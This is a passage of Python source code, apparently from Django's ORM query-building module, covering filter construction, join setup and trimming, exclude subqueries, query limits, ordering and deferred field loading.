lookup_parts = [\n 'exact']\n elif len(lookup_parts) > 1:\n if not field_parts:\n raise FieldError('Invalid lookup \"%s\" for model %s\".' % (\n lookup, self.get_meta().model.__name__))\n return (\n lookup_parts, field_parts, False)\n\n def check_query_object_type(self, value, opts, field):\n \"\"\"\n Checks whether the object passed while querying is of the correct type.\n If not, it raises a ValueError specifying the wrong object.\n \"\"\"\n if hasattr(value, '_meta'):\n if not check_rel_lookup_compatibility(value._meta.model, opts, field):\n raise ValueError('Cannot query \"%s\": Must be \"%s\" instance.' 
% (\n value, opts.object_name))\n\n def check_related_objects(self, field, value, opts):\n \"\"\"\n Checks the type of object passed to query relations.\n \"\"\"\n if field.is_relation:\n if getattr(value, '_forced_pk', False) and not check_rel_lookup_compatibility(value.model, opts, field):\n raise ValueError('Cannot use QuerySet for \"%s\": Use a QuerySet for \"%s\".' % (\n value.model._meta.object_name, opts.object_name))\n elif hasattr(value, '_meta'):\n self.check_query_object_type(value, opts, field)\n elif hasattr(value, '__iter__'):\n for v in value:\n self.check_query_object_type(v, opts, field)\n\n def build_lookup(self, lookups, lhs, rhs):\n \"\"\"\n Tries to extract transforms and lookup from given lhs.\n\n The lhs value is something that works like SQLExpression.\n The rhs value is what the lookup is going to compare against.\n The lookups is a list of names to extract using get_lookup()\n and get_transform().\n \"\"\"\n lookups = lookups[:]\n while lookups:\n name = lookups[0]\n if len(lookups) == 1:\n final_lookup = lhs.get_lookup(name)\n if not final_lookup:\n lhs = self.try_transform(lhs, name, lookups)\n final_lookup = lhs.get_lookup('exact')\n return final_lookup(lhs, rhs)\n lhs = self.try_transform(lhs, name, lookups)\n lookups = lookups[1:]\n\n def try_transform(self, lhs, name, rest_of_lookups):\n \"\"\"\n Helper method for build_lookup. Tries to fetch and initialize\n a transform for name parameter from lhs.\n \"\"\"\n transform_class = lhs.get_transform(name)\n if transform_class:\n return transform_class(lhs)\n raise FieldError(\"Unsupported lookup '%s' for %s or join on the field not permitted.\" % (\n name, lhs.output_field.__class__.__name__))\n\n def build_filter(self, filter_expr, branch_negated=False, current_negated=False, can_reuse=None, connector=AND, allow_joins=True, split_subq=True):\n \"\"\"\n Builds a WhereNode for a single filter clause, but doesn't add it\n to this Query. Query.add_q() will then add this filter to the where\n Node.\n\n The 'branch_negated' tells us if the current branch contains any\n negations. This will be used to determine if subqueries are needed.\n\n The 'current_negated' is used to determine if the current filter is\n negated or not and this will be used to determine if IS NULL filtering\n is needed.\n\n The difference between current_netageted and branch_negated is that\n branch_negated is set on first negation, but current_negated is\n flipped for each negation.\n\n Note that add_filter will not do any negating itself, that is done\n upper in the code by add_q().\n\n The 'can_reuse' is a set of reusable joins for multijoins.\n\n The method will create a filter clause that can be added to the current\n query. 
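A toy illustration of the convention solve_lookup_type parses: a keyword such as 'foobar__id__icontains' splits on LOOKUP_SEP into a field path plus a trailing lookup, and a bare field name implies 'exact'. The KNOWN_LOOKUPS set here is an invented stand-in for Django's lookup registry, which the real method consults via names_to_path.

LOOKUP_SEP = "__"
KNOWN_LOOKUPS = {"exact", "iexact", "icontains", "isnull", "in"}

def split_lookup(arg):
    *field_parts, last = arg.split(LOOKUP_SEP)
    if last in KNOWN_LOOKUPS:
        return field_parts, last
    # No recognised lookup at the end: the whole string is a field path.
    return field_parts + [last], "exact"

assert split_lookup("author__name__icontains") == (["author", "name"], "icontains")
assert split_lookup("name") == (["name"], "exact")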
However, if the filter isn't added to the query then the caller\n is responsible for unreffing the joins used.\n \"\"\"\n if isinstance(filter_expr, dict):\n raise FieldError('Cannot parse keyword query as dict')\n arg, value = filter_expr\n if not arg:\n raise FieldError('Cannot parse keyword query %r' % arg)\n lookups, parts, reffed_expression = self.solve_lookup_type(arg)\n if not allow_joins and len(parts) > 1:\n raise FieldError('Joined field references are not permitted in this query')\n value, lookups, used_joins = self.prepare_lookup_value(value, lookups, can_reuse, allow_joins)\n clause = self.where_class()\n if reffed_expression:\n condition = self.build_lookup(lookups, reffed_expression, value)\n clause.add(condition, AND)\n return (\n clause, [])\n else:\n opts = self.get_meta()\n alias = self.get_initial_alias()\n allow_many = not branch_negated or not split_subq\n try:\n field, sources, opts, join_list, path = self.setup_joins(parts, opts, alias, can_reuse=can_reuse, allow_many=allow_many)\n if isinstance(value, Iterator):\n value = list(value)\n self.check_related_objects(field, value, opts)\n self._lookup_joins = join_list\n except MultiJoin as e:\n return self.split_exclude(filter_expr, LOOKUP_SEP.join(parts[:e.level]), can_reuse, e.names_with_path)\n\n if can_reuse is not None:\n can_reuse.update(join_list)\n used_joins = set(used_joins).union(set(join_list))\n targets, alias, join_list = self.trim_joins(sources, join_list, path)\n if field.is_relation:\n num_lookups = len(lookups)\n if num_lookups > 1:\n raise FieldError(('Related Field got invalid lookup: {}').format(lookups[0]))\n assert num_lookups > 0\n lookup_class = field.get_lookup(lookups[0])\n if lookup_class is None:\n raise FieldError(('Related Field got invalid lookup: {}').format(lookups[0]))\n if len(targets) == 1:\n lhs = targets[0].get_col(alias, field)\n else:\n lhs = MultiColSource(alias, targets, sources, field)\n condition = lookup_class(lhs, value)\n lookup_type = lookup_class.lookup_name\n else:\n col = targets[0].get_col(alias, field)\n condition = self.build_lookup(lookups, col, value)\n lookup_type = condition.lookup_name\n clause.add(condition, AND)\n require_outer = lookup_type == 'isnull' and value is True and not current_negated\n if current_negated and (lookup_type != 'isnull' or value is False):\n require_outer = True\n if lookup_type != 'isnull' and (self.is_nullable(targets[0]) or self.alias_map[join_list[(-1)]].join_type == LOUTER):\n lookup_class = targets[0].get_lookup('isnull')\n clause.add(lookup_class(targets[0].get_col(alias, sources[0]), False), AND)\n return (\n clause, used_joins if not require_outer else ())\n\n def add_filter(self, filter_clause):\n self.add_q(Q(**{filter_clause[0]: filter_clause[1]}))\n\n def add_q(self, q_object):\n \"\"\"\n A preprocessor for the internal _add_q(). 
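The branch_negated/current_negated bookkeeping that build_filter's docstring describes (and that _add_q implements below) reduces to two booleans; a plain sketch with no WhereNode involved:

def descend(node_negated, branch_negated, current_negated):
    # branch_negated latches on the first NOT; current_negated flips each time.
    return branch_negated or node_negated, current_negated ^ node_negated

# NOT(NOT(f)): the branch has seen a negation, but the two NOTs cancel out.
state = descend(True, False, False)   # entering the outer NOT
state = descend(True, *state)         # entering the inner NOT
assert state == (True, False)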
Responsible for doing final\n join promotion.\n \"\"\"\n existing_inner = set(a for a in self.alias_map if self.alias_map[a].join_type == INNER)\n clause, _ = self._add_q(q_object, self.used_aliases)\n if clause:\n self.where.add(clause, AND)\n self.demote_joins(existing_inner)\n\n def _add_q(self, q_object, used_aliases, branch_negated=False, current_negated=False, allow_joins=True, split_subq=True):\n \"\"\"\n Adds a Q-object to the current filter.\n \"\"\"\n connector = q_object.connector\n current_negated = current_negated ^ q_object.negated\n branch_negated = branch_negated or q_object.negated\n target_clause = self.where_class(connector=connector, negated=q_object.negated)\n joinpromoter = JoinPromoter(q_object.connector, len(q_object.children), current_negated)\n for child in q_object.children:\n if isinstance(child, Node):\n child_clause, needed_inner = self._add_q(child, used_aliases, branch_negated, current_negated, allow_joins, split_subq)\n joinpromoter.add_votes(needed_inner)\n else:\n child_clause, needed_inner = self.build_filter(child, can_reuse=used_aliases, branch_negated=branch_negated, current_negated=current_negated, connector=connector, allow_joins=allow_joins, split_subq=split_subq)\n joinpromoter.add_votes(needed_inner)\n if child_clause:\n target_clause.add(child_clause, connector)\n\n needed_inner = joinpromoter.update_join_types(self)\n return (target_clause, needed_inner)\n\n def names_to_path(self, names, opts, allow_many=True, fail_on_missing=False):\n \"\"\"\n Walks the list of names and turns them into PathInfo tuples. Note that\n a single name in 'names' can generate multiple PathInfos (m2m for\n example).\n\n 'names' is the path of names to travel, 'opts' is the model Options we\n start the name resolving from, 'allow_many' is as for setup_joins().\n If fail_on_missing is set to True, then a name that can't be resolved\n will generate a FieldError.\n\n Returns a list of PathInfo tuples. In addition returns the final field\n (the last used join field), and target (which is a field guaranteed to\n contain the same value as the final field). Finally, the method returns\n those names that weren't found (which are likely transforms and the\n final lookup).\n \"\"\"\n path, names_with_path = [], []\n for pos, name in enumerate(names):\n cur_names_with_path = (\n name, [])\n if name == 'pk':\n name = opts.pk.name\n field = None\n try:\n field = opts.get_field(name)\n except FieldDoesNotExist:\n if name in self.annotation_select:\n field = self.annotation_select[name].output_field\n elif pos == 0:\n for rel in opts.related_objects:\n if name == rel.related_model._meta.model_name and rel.related_name == rel.related_model._meta.default_related_name:\n related_name = rel.related_name\n field = opts.get_field(related_name)\n warnings.warn(\"Query lookup '%s' is deprecated in favor of Meta.default_related_name '%s'.\" % (\n name, related_name), RemovedInDjango20Warning, 2)\n break\n\n if field is not None:\n if field.is_relation and not field.related_model:\n raise FieldError('Field %r does not generate an automatic reverse relation and therefore cannot be used for reverse querying. If it is a GenericForeignKey, consider adding a GenericRelation.' 
% name)\n try:\n model = field.model._meta.concrete_model\n except AttributeError:\n model = None\n\n else:\n pos -= 1\n if pos == -1 or fail_on_missing:\n field_names = list(get_field_names_from_opts(opts))\n available = sorted(field_names + list(self.annotation_select))\n raise FieldError(\"Cannot resolve keyword '%s' into field. Choices are: %s\" % (\n name, (', ').join(available)))\n break\n if model is not opts.model:\n path_to_parent = opts.get_path_to_parent(model)\n if path_to_parent:\n path.extend(path_to_parent)\n cur_names_with_path[1].extend(path_to_parent)\n opts = path_to_parent[(-1)].to_opts\n if hasattr(field, 'get_path_info'):\n pathinfos = field.get_path_info()\n if not allow_many:\n for inner_pos, p in enumerate(pathinfos):\n if p.m2m:\n cur_names_with_path[1].extend(pathinfos[0:inner_pos + 1])\n names_with_path.append(cur_names_with_path)\n raise MultiJoin(pos + 1, names_with_path)\n\n last = pathinfos[(-1)]\n path.extend(pathinfos)\n final_field = last.join_field\n opts = last.to_opts\n targets = last.target_fields\n cur_names_with_path[1].extend(pathinfos)\n names_with_path.append(cur_names_with_path)\n else:\n final_field = field\n targets = (field,)\n if fail_on_missing and pos + 1 != len(names):\n raise FieldError(\"Cannot resolve keyword %r into field. Join on '%s' not permitted.\" % (\n names[(pos + 1)], name))\n break\n\n return (\n path, final_field, targets, names[pos + 1:])\n\n def setup_joins(self, names, opts, alias, can_reuse=None, allow_many=True):\n \"\"\"\n Compute the necessary table joins for the passage through the fields\n given in 'names'. 'opts' is the Options class for the current model\n (which gives the table we are starting from), 'alias' is the alias for\n the table to start the joining from.\n\n The 'can_reuse' defines the reverse foreign key joins we can reuse. It\n can be None in which case all joins are reusable or a set of aliases\n that can be reused. Note that non-reverse foreign keys are always\n reusable when using setup_joins().\n\n If 'allow_many' is False, then any reverse foreign key seen will\n generate a MultiJoin exception.\n\n Returns the final field involved in the joins, the target field (used\n for any 'where' constraint), the final 'opts' value, the joins and the\n field path travelled to generate the joins.\n\n The target field is the field containing the concrete value. Final\n field can be something different, for example foreign key pointing to\n that value. Final field is needed for example in some value\n conversions (convert 'obj' in fk__id=obj to pk val using the foreign\n key field for example).\n \"\"\"\n joins = [\n alias]\n path, final_field, targets, rest = self.names_to_path(names, opts, allow_many, fail_on_missing=True)\n for join in path:\n opts = join.to_opts\n if join.direct:\n nullable = self.is_nullable(join.join_field)\n else:\n nullable = True\n connection = Join(opts.db_table, alias, None, INNER, join.join_field, nullable)\n reuse = can_reuse if join.m2m else None\n alias = self.join(connection, reuse=reuse)\n joins.append(alias)\n\n return (\n final_field, targets, opts, joins, path)\n\n def trim_joins(self, targets, joins, path):\n \"\"\"\n The 'target' parameter is the final field being joined to, 'joins'\n is the full list of join aliases. The 'path' contain the PathInfos\n used to create the joins.\n\n Returns the final target field and table alias and the new active\n joins.\n\n We will always trim any direct join if we have the target column\n available already in the previous table. 
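The trimming rule trim_joins states (drop a direct join when every needed column already lives on the previous table) in plain-data form; the column sets are invented for illustration:

book_columns = {"id", "title", "author_id"}

def join_required(needed_columns):
    # Only join the related table when some needed column is not local.
    return not needed_columns <= book_columns

assert not join_required({"author_id"})  # filtering on the author pk stays local
assert join_required({"author_name"})    # the author's name forces a JOIN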
Reverse joins can't be\n trimmed as we don't know if there is anything on the other side of\n the join.\n \"\"\"\n joins = joins[:]\n for pos, info in enumerate(reversed(path)):\n if len(joins) == 1 or not info.direct:\n break\n join_targets = set(t.column for t in info.join_field.foreign_related_fields)\n cur_targets = set(t.column for t in targets)\n if not cur_targets.issubset(join_targets):\n break\n targets_dict = {r[1].column:r[0] for r in info.join_field.related_fields if r[1].column in cur_targets}\n targets = tuple(targets_dict[t.column] for t in targets)\n self.unref_alias(joins.pop())\n\n return (\n targets, joins[(-1)], joins)\n\n def resolve_ref(self, name, allow_joins=True, reuse=None, summarize=False):\n if not allow_joins and LOOKUP_SEP in name:\n raise FieldError('Joined field references are not permitted in this query')\n if name in self.annotations:\n if summarize:\n return Ref(name, self.annotation_select[name])\n else:\n return self.annotation_select[name]\n\n else:\n field_list = name.split(LOOKUP_SEP)\n field, sources, opts, join_list, path = self.setup_joins(field_list, self.get_meta(), self.get_initial_alias(), reuse)\n targets, _, join_list = self.trim_joins(sources, join_list, path)\n if len(targets) > 1:\n raise FieldError(\"Referencing multicolumn fields with F() objects isn't supported\")\n if reuse is not None:\n reuse.update(join_list)\n col = targets[0].get_col(join_list[(-1)], sources[0])\n return col\n return\n\n def split_exclude(self, filter_expr, prefix, can_reuse, names_with_path):\n \"\"\"\n When doing an exclude against any kind of N-to-many relation, we need\n to use a subquery. This method constructs the nested query, given the\n original exclude filter (filter_expr) and the portion up to the first\n N-to-many relation field.\n\n As an example we could have original filter ~Q(child__name='foo').\n We would get here with filter_expr = child__name, prefix = child and\n can_reuse is a set of joins usable for filters in the original query.\n\n We will turn this into equivalent of:\n WHERE NOT (pk IN (SELECT parent_id FROM thetable\n WHERE name = 'foo' AND parent_id IS NOT NULL))\n\n It might be worth it to consider using WHERE NOT EXISTS as that has\n saner null handling, and is easier for the backend's optimizer to\n handle.\n \"\"\"\n query = Query(self.model)\n query.add_filter(filter_expr)\n query.clear_ordering(True)\n trimmed_prefix, contains_louter = query.trim_start(names_with_path)\n col = query.select[0]\n select_field = col.target\n alias = col.alias\n if self.is_nullable(select_field):\n lookup_class = select_field.get_lookup('isnull')\n lookup = lookup_class(select_field.get_col(alias), False)\n query.where.add(lookup, AND)\n if alias in can_reuse:\n pk = select_field.model._meta.pk\n query.bump_prefix(self)\n lookup_class = select_field.get_lookup('exact')\n lookup = lookup_class(pk.get_col(query.select[0].alias), pk.get_col(alias))\n query.where.add(lookup, AND)\n query.external_aliases.add(alias)\n condition, needed_inner = self.build_filter((\n '%s__in' % trimmed_prefix, query), current_negated=True, branch_negated=True, can_reuse=can_reuse)\n if contains_louter:\n or_null_condition, _ = self.build_filter((\n '%s__isnull' % trimmed_prefix, True), current_negated=True, branch_negated=True, can_reuse=can_reuse)\n condition.add(or_null_condition, OR)\n return (\n condition, needed_inner)\n\n def set_empty(self):\n self.where.add(NothingNode(), AND)\n\n def is_empty(self):\n return any(isinstance(c, NothingNode) for c in 
self.where.children)\n\n def set_limits(self, low=None, high=None):\n \"\"\"\n Adjusts the limits on the rows retrieved. We use low/high to set these,\n as it makes it more Pythonic to read and write. When the SQL query is\n created, they are converted to the appropriate offset and limit values.\n\n Any limits passed in here are applied relative to the existing\n constraints. So low is added to the current low value and both will be\n clamped to any existing high value.\n \"\"\"\n if high is not None:\n if self.high_mark is not None:\n self.high_mark = min(self.high_mark, self.low_mark + high)\n else:\n self.high_mark = self.low_mark + high\n if low is not None:\n if self.high_mark is not None:\n self.low_mark = min(self.high_mark, self.low_mark + low)\n else:\n self.low_mark = self.low_mark + low\n if self.low_mark == self.high_mark:\n self.set_empty()\n return\n\n def clear_limits(self):\n \"\"\"\n Clears any existing limits.\n \"\"\"\n self.low_mark, self.high_mark = (0, None)\n return\n\n def can_filter(self):\n \"\"\"\n Returns True if adding filters to this instance is still possible.\n\n Typically, this means no limits or offsets have been put on the results.\n \"\"\"\n return not self.low_mark and self.high_mark is None\n\n def clear_select_clause(self):\n \"\"\"\n Removes all fields from SELECT clause.\n \"\"\"\n self.select = []\n self.default_cols = False\n self.select_related = False\n self.set_extra_mask(())\n self.set_annotation_mask(())\n\n def clear_select_fields(self):\n \"\"\"\n Clears the list of fields to select (but not extra_select columns).\n Some queryset types completely replace any existing list of select\n columns.\n \"\"\"\n self.select = []\n self.values_select = []\n\n def add_select(self, col):\n self.default_cols = False\n self.select.append(col)\n\n def set_select(self, cols):\n self.default_cols = False\n self.select = cols\n\n def add_distinct_fields(self, *field_names):\n \"\"\"\n Adds and resolves the given fields to the query's \"distinct on\" clause.\n \"\"\"\n self.distinct_fields = field_names\n self.distinct = True\n\n def add_fields(self, field_names, allow_m2m=True):\n \"\"\"\n Adds the given (model) fields to the select set. The field names are\n added in the order specified.\n \"\"\"\n alias = self.get_initial_alias()\n opts = self.get_meta()\n try:\n for name in field_names:\n _, targets, _, joins, path = self.setup_joins(name.split(LOOKUP_SEP), opts, alias, allow_many=allow_m2m)\n targets, final_alias, joins = self.trim_joins(targets, joins, path)\n for target in targets:\n self.add_select(target.get_col(final_alias))\n\n except MultiJoin:\n raise FieldError(\"Invalid field name: '%s'\" % name)\n except FieldError:\n if LOOKUP_SEP in name:\n raise\n else:\n names = sorted(list(get_field_names_from_opts(opts)) + list(self.extra) + list(self.annotation_select))\n raise FieldError('Cannot resolve keyword %r into field. Choices are: %s' % (\n name, (', ').join(names)))\n\n def add_ordering(self, *ordering):\n \"\"\"\n Adds items from the 'ordering' sequence to the query's \"order by\"\n clause. 
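The relative-slicing arithmetic set_limits implements, as a standalone function with a worked example (toy code mirroring the method's order of operations, high before low):

def set_limits(low_mark, high_mark, low=None, high=None):
    # New limits are applied relative to the existing slice.
    if high is not None:
        high_mark = low_mark + high if high_mark is None else min(high_mark, low_mark + high)
    if low is not None:
        low_mark = low_mark + low if high_mark is None else min(high_mark, low_mark + low)
    return low_mark, high_mark

# qs[10:20][2:5] selects rows 12..15 of the unsliced query.
assert set_limits(10, 20, low=2, high=5) == (12, 15)

When low_mark ends up equal to high_mark, the real method calls set_empty(), since such a slice can no longer match anything.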
These items are either field names (not column names) --\n possibly with a direction prefix ('-' or '?') -- or OrderBy\n expressions.\n\n If 'ordering' is empty, all ordering is cleared from the query.\n \"\"\"\n errors = []\n for item in ordering:\n if not hasattr(item, 'resolve_expression') and not ORDER_PATTERN.match(item):\n errors.append(item)\n if getattr(item, 'contains_aggregate', False):\n raise FieldError('Using an aggregate in order_by() without also including it in annotate() is not allowed: %s' % item)\n\n if errors:\n raise FieldError('Invalid order_by arguments: %s' % errors)\n if ordering:\n self.order_by.extend(ordering)\n else:\n self.default_ordering = False\n\n def clear_ordering(self, force_empty):\n \"\"\"\n Removes any ordering settings. If 'force_empty' is True, there will be\n no ordering in the resulting query (not even the model's default).\n \"\"\"\n self.order_by = []\n self.extra_order_by = ()\n if force_empty:\n self.default_ordering = False\n\n def set_group_by(self):\n \"\"\"\n Expands the GROUP BY clause required by the query.\n\n This will usually be the set of all non-aggregate fields in the\n return data. If the database backend supports grouping by the\n primary key, and the query would be equivalent, the optimization\n will be made automatically.\n \"\"\"\n self.group_by = []\n for col in self.select:\n self.group_by.append(col)\n\n if self.annotation_select:\n for alias, annotation in six.iteritems(self.annotation_select):\n for col in annotation.get_group_by_cols():\n self.group_by.append(col)\n\n def add_select_related(self, fields):\n \"\"\"\n Sets up the select_related data structure so that we only select\n certain related models (as opposed to all models, when\n self.select_related=True).\n \"\"\"\n if isinstance(self.select_related, bool):\n field_dict = {}\n else:\n field_dict = self.select_related\n for field in fields:\n d = field_dict\n for part in field.split(LOOKUP_SEP):\n d = d.setdefault(part, {})\n\n self.select_related = field_dict\n\n def add_extra(self, select, select_params, where, params, tables, order_by):\n \"\"\"\n Adds data to the various extra_* attributes for user-created additions\n to the query.\n \"\"\"\n if select:\n select_pairs = OrderedDict()\n if select_params:\n param_iter = iter(select_params)\n else:\n param_iter = iter([])\n for name, entry in select.items():\n entry = force_text(entry)\n entry_params = []\n pos = entry.find('%s')\n while pos != -1:\n if pos == 0 or entry[(pos - 1)] != '%':\n entry_params.append(next(param_iter))\n pos = entry.find('%s', pos + 2)\n\n select_pairs[name] = (\n entry, entry_params)\n\n self.extra.update(select_pairs)\n if where or params:\n self.where.add(ExtraWhere(where, params), AND)\n if tables:\n self.extra_tables += tuple(tables)\n if order_by:\n self.extra_order_by = order_by\n\n def clear_deferred_loading(self):\n \"\"\"\n Remove any fields from the deferred loading set.\n \"\"\"\n self.deferred_loading = (\n set(), True)\n\n def add_deferred_loading(self, field_names):\n \"\"\"\n Add the given list of model field names to the set of fields to\n exclude from loading from the database when automatic column selection\n is done. 
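The set arithmetic add_deferred_loading goes on to implement can be sketched directly; existing and defer mirror the two halves of the deferred_loading tuple:

def add_deferred(existing, defer, field_names):
    if defer:
        # Plain defer mode: the deferred names simply accumulate.
        return existing | set(field_names), True
    # An .only() set is in effect: deferring a field removes it from
    # the immediate-loading set instead.
    return existing - set(field_names), False

assert add_deferred({"bio"}, True, ["age"]) == ({"bio", "age"}, True)
assert add_deferred({"name", "age"}, False, ["age"]) == ({"name"}, False)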
The new field names are added to any existing field names that\n are deferred (or removed from any existing field names that are marked\n as the only ones for immediate loading).\n \"\"\"\n existing, defer = self.deferred_loading\n if defer:\n self.deferred_loading = (existing.union(field_names), True)\n else:\n self.deferred_loading = (\n existing.difference(field_names), False)\n\n def add_immediate_loading(self, field_names):\n \"\"\"\n Add the given list of model field names to the set of fields to\n retrieve when the SQL is executed (\"immediate loading\" fields). The\n field names replace any existing immediate loading field names. If\n there are field names already specified for deferred loading, those\n names are removed from the new field_names before storing the new names\n for immediate loading. (That is, immediate loading overrides any\n existing immediate values, but respects existing deferrals.)\n \"\"\"\n existing, defer = self.deferred_loading\n field_names = set(field_names)\n if 'pk' in field_names:\n field_names.remove('pk')\n field_names.add(self.get_meta().pk.name)\n if defer:\n self.deferred_loading = (\n field_names.difference(existing), False)\n else:\n self.deferred_loading = (\n field_names, False)\n\n def get_loaded_field_names(self):\n \"\"\"\n If any fields are marked to be deferred, returns a dictionary mapping\n models to a set of names in those fields that will be loaded. If a\n model is not in the returned dictionary, none of its fields are\n deferred.\n\n If no fields are marked for deferral, returns an empty dictionary.\n \"\"\"\n try:\n return self._loaded_field_names_cache\n except AttributeError:\n collection = {}\n self.deferred_to_data(collection, self.get_loaded_field_names_cb)\n self._loaded_field_names_cache = collection\n return collection\n\n def get_loaded_field_names_cb(self, target, model, fields):\n \"\"\"\n Callback used by get_deferred_field_names().\n \"\"\"\n target[model] = {f.attname for f in fields}\n\n def set_annotation_mask(self, names):\n \"\"\"Set the mask of annotations that will actually be returned by the SELECT\"\"\"\n if names is None:\n self.annotation_select_mask = None\n else:\n self.annotation_select_mask = set(names)\n self._annotation_select_cache = None\n return\n\n def append_annotation_mask(self, names):\n if self.annotation_select_mask is not None:\n self.set_annotation_mask(set(names).union(self.annotation_select_mask))\n return\n\n def set_extra_mask(self, names):\n \"\"\"\n Set the mask of extra select items that will be returned by SELECT,\n we don't actually remove them from the Query since they might be used\n later\n \"\"\"\n if names is None:\n self.extra_select_mask = None\n else:\n self.extra_select_mask = set(names)\n self._extra_select_cache = None\n return\n\n def set_values(self, fields):\n self.select_related = False\n self.clear_deferred_loading()\n self.clear_select_fields()\n if self.group_by is True:\n self.add_fields((f.attname for f in self.model._meta.concrete_fields), False)\n self.set_group_by()\n self.clear_select_fields()\n if fields:\n field_names = []\n extra_names = []\n annotation_names = []\n if not self._extra and not self._annotations:\n field_names = list(fields)\n else:\n self.default_cols = False\n for f in fields:\n if f in self.extra_select:\n extra_names.append(f)\n elif f in self.annotation_select:\n annotation_names.append(f)\n else:\n field_names.append(f)\n\n self.set_extra_mask(extra_names)\n self.set_annotation_mask(annotation_names)\n else:\n field_names = [ f.attname 
for f in self.model._meta.concrete_fields ]\n self.values_select = field_names\n self.add_fields(field_names, True)\n\n @property\n def annotation_select(self):\n \"\"\"The OrderedDict of aggregate columns that are not masked, and should\n be used in the SELECT clause.\n\n This result is cached for optimization purposes.\n \"\"\"\n if self._annotation_select_cache is not None:\n return self._annotation_select_cache\n else:\n if not self._annotations:\n return {}\n else:\n if self.annotation_select_mask is not None:\n self._annotation_select_cache = OrderedDict((k, v) for k, v in self.annotations.items() if k in self.annotation_select_mask)\n return self._annotation_select_cache\n return self.annotations\n\n return\n\n @property\n def extra_select(self):\n if self._extra_select_cache is not None:\n return self._extra_select_cache\n else:\n if not self._extra:\n return {}\n else:\n if self.extra_select_mask is not None:\n self._extra_select_cache = OrderedDict((k, v) for k, v in self.extra.items() if k in self.extra_select_mask)\n return self._extra_select_cache\n return self.extra\n\n return\n\n def trim_start(self, names_with_path):\n \"\"\"\n Trims joins from the start of the join path. The candidates for trim\n are the PathInfos in names_with_path structure that are m2m joins.\n\n Also sets the select column so the start matches the join.\n\n This method is meant to be used for generating the subquery joins &\n cols in split_exclude().\n\n Returns a lookup usable for doing outerq.filter(lookup=self). Returns\n also if the joins in the prefix contain a LEFT OUTER join.\n _\"\"\"\n all_paths = []\n for _, paths in names_with_path:\n all_paths.extend(paths)\n\n contains_louter = False\n lookup_tables = [ t for t in self.tables if t in self._lookup_joins or t == self.tables[0] ]\n for trimmed_paths, path in enumerate(all_paths):\n if path.m2m:\n break\n if self.alias_map[lookup_tables[(trimmed_paths + 1)]].join_type == LOUTER:\n contains_louter = True\n alias = lookup_tables[trimmed_paths]\n self.unref_alias(alias)\n\n join_field = path.join_field.field\n paths_in_prefix = trimmed_paths\n trimmed_prefix = []\n for name, path in names_with_path:\n if paths_in_prefix - len(path) < 0:\n break\n trimmed_prefix.append(name)\n paths_in_prefix -= len(path)\n\n trimmed_prefix.append(join_field.foreign_related_fields[0].name)\n trimmed_prefix = LOOKUP_SEP.join(trimmed_prefix)\n if self.alias_map[lookup_tables[(trimmed_paths + 1)]].join_type != LOUTER:\n select_fields = [ r[0] for r in join_field.related_fields ]\n select_alias = lookup_tables[(trimmed_paths + 1)]\n self.unref_alias(lookup_tables[trimmed_paths])\n extra_restriction = join_field.get_extra_restriction(self.where_class, None, lookup_tables[(trimmed_paths + 1)])\n if extra_restriction:\n self.where.add(extra_restriction, AND)\n else:\n select_fields = [ r[1] for r in join_field.related_fields ]\n select_alias = lookup_tables[trimmed_paths]\n for table in self.tables:\n if self.alias_refcount[table] > 0:\n self.alias_map[table] = BaseTable(self.alias_map[table].table_name, table)\n break\n\n self.set_select([ f.get_col(select_alias) for f in select_fields ])\n return (trimmed_prefix, contains_louter)\n\n def is_nullable(self, field):\n \"\"\"\n A helper to check if the given field should be treated as nullable.\n\n Some backends treat '' as null and Django treats such fields as\n nullable for those backends. 
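Aside from some decompiler noise (the dead trailing returns), annotation_select and extra_select share one pattern: filter a mapping down to a mask once, then memoize. A self-contained rendering of that pattern, with invented data:

from collections import OrderedDict

class MaskedSelect:
    def __init__(self, annotations, mask=None):
        self.annotations = annotations
        self.mask = mask
        self._cache = None

    @property
    def annotation_select(self):
        # Compute the mask-filtered mapping once and reuse it afterwards.
        if self._cache is None:
            if self.mask is None:
                self._cache = self.annotations
            else:
                self._cache = OrderedDict(
                    (k, v) for k, v in self.annotations.items() if k in self.mask
                )
        return self._cache

s = MaskedSelect(OrderedDict(total=1, avg=2), mask={"total"})
assert dict(s.annotation_select) == {"total": 1}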
In such situations field.null can be\n False even if we should treat the field as nullable.\n \"\"\"\n if connections[DEFAULT_DB_ALIAS].features.interprets_empty_strings_as_nulls and field.empty_strings_allowed:\n return True\n else:\n return field.null\n\n def as_subquery_filter(self, db):\n self._db = db\n self.subquery = True\n if self.low_mark == 0 and self.high_mark is None and not self.distinct_fields and not self.select_for_update:\n self.clear_ordering(True)\n return self\n\n\ndef get_order_dir(field, default='ASC'):\n \"\"\"\n Returns the field name and direction for an order specification. For\n example, '-foo' is returned as ('foo', 'DESC').\n\n The 'default' param is used to indicate which way no prefix (or a '+'\n prefix) should sort. The '-' prefix always sorts the opposite way.\n \"\"\"\n dirn = ORDER_DIR[default]\n if field[0] == '-':\n return (field[1:], dirn[1])\n return (\n field, dirn[0])\n\n\ndef add_to_dict(data, key, value):\n \"\"\"\n A helper function to add \"value\" to the set of values for \"key\", whether or\n not \"key\" already exists.\n \"\"\"\n if key in data:\n data[key].add(value)\n else:\n data[key] = {\n value}\n\n\ndef is_reverse_o2o(field):\n \"\"\"\n A little helper to check if the given field is reverse-o2o. The field is\n expected to be some sort of relation field or related object.\n \"\"\"\n return field.is_relation and field.one_to_one and not field.concrete\n\n\nclass JoinPromoter(object):\n \"\"\"\n A class to abstract away join promotion problems for complex filter\n conditions.\n \"\"\"\n\n def __init__(self, connector, num_children, negated):\n self.connector = connector\n self.negated = negated\n if self.negated:\n if connector == AND:\n self.effective_connector = OR\n else:\n self.effective_connector = AND\n else:\n self.effective_connector = self.connector\n self.num_children = num_children\n self.votes = Counter()\n\n def add_votes(self, votes):\n \"\"\"\n Add single vote per item to self.votes. Parameter can be any\n iterable.\n \"\"\"\n self.votes.update(votes)\n\n def update_join_types(self, query):\n \"\"\"\n Change join types so that the generated query is as efficient as\n possible, but still correct. 
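JoinPromoter's constructor flips the connector under negation, which is just De Morgan's law: NOT (a AND b) is (NOT a) OR (NOT b), so a negated AND must be treated as an OR for promotion purposes.

AND, OR = "AND", "OR"

def effective_connector(connector, negated):
    if not negated:
        return connector
    # De Morgan: negation swaps the connective.
    return OR if connector == AND else AND

assert effective_connector(AND, negated=True) == OR
assert effective_connector(OR, negated=True) == AND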
